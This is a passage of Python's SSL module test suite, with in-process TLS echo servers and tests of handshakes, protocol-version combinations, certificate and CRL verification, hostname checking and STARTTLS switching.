ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_handshake(self):
with support.transient_internet(REMOTE_HOST):
sock = socket.socket(socket.AF_INET)
sock.connect((REMOTE_HOST, 443))
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(REMOTE_ROOT_CERT)
ctx.check_hostname = True
sslobj = ctx.wrap_bio(incoming, outgoing, False, REMOTE_HOST)
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# self-signed.pythontest.net probably shuts down the TCP
# connection without sending a secure shutdown message, and
# this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
sock.close()
def test_read_write_data(self):
with support.transient_internet(REMOTE_HOST):
sock = socket.socket(socket.AF_INET)
sock.connect((REMOTE_HOST, 443))
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'GET / HTTP/1.0\r\n\r\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf[:5], b'HTTP/')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
sock.close()
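# The remaining tests rely on the threading module; record whether it is
# available so they can be skipped when it is not.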
try:
import threading
except ImportError:
_have_threads = False
else:
_have_threads = True
from test.ssl_servers import make_https_server
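# In-process echo server: every accepted connection is served by a
# ConnectionHandler thread which wraps the socket in TLS (immediately, or after
# a STARTTLS exchange when starttls_server is set) and echoes data back
# lower-cased.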
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
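# Wrap the plain connection in TLS; on failure, record the error, stop the
# server and return False, otherwise remember the shared ciphers and return True.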
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ssl.SSLError, ConnectionResetError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
self.server.conn_errors.append(e)
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
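# Use the TLS connection once wrap_conn() has run, the raw socket otherwise.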
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
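# Per-connection loop: handle the small command protocol (STARTTLS, ENDTLS,
# 'over', 'CB tls-unique') and echo anything else back lower-cased.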
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except OSError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
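# Either use the supplied SSLContext as-is, or build one from the individual
# certificate/protocol/cipher arguments.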
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLSv1)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen()
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
self.sock.close()
def stop(self):
self.active = False
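# Echo server built on asyncore, run from a background thread; each accepted
# connection completes its TLS handshake asynchronously in _do_ssl_handshake().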
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer(asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = ssl.wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
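# Drive the non-blocking handshake: WANT_READ/WANT_WRITE mean 'retry on the
# next event', EOF or ECONNABORTED closes the connection, and a clean return
# marks the handshake as finished.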
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_SSLv23:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(CERTFILE)
ctx.load_verify_locations(CERTFILE)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
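# End-to-end tests that start an in-process echo server and connect to it over
# the loopback interface.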
class ThreadedTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
with self.subTest(protocol=ssl._PROTOCOL_NAMES[protocol]):
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket(),
do_handshake_on_connect=False)
s.connect((HOST, server.port))
# getpeercert() raises ValueError while the handshake isn't
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
s.close()
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="localhost") as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(ssl.CertificateError,
"hostname 'invalid' doesn't match 'localhost'"):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
context.wrap_socket(s)
def test_wrong_cert(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
"wrongcert.pem")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_REQUIRED,
cacerts=CERTFILE, chatty=False,
connectionchatty=False)
with server, \
socket.socket() as sock, \
ssl.wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = ssl.wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv23(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1')
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23,
False, client_options=ssl.OP_NO_SSLv2)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
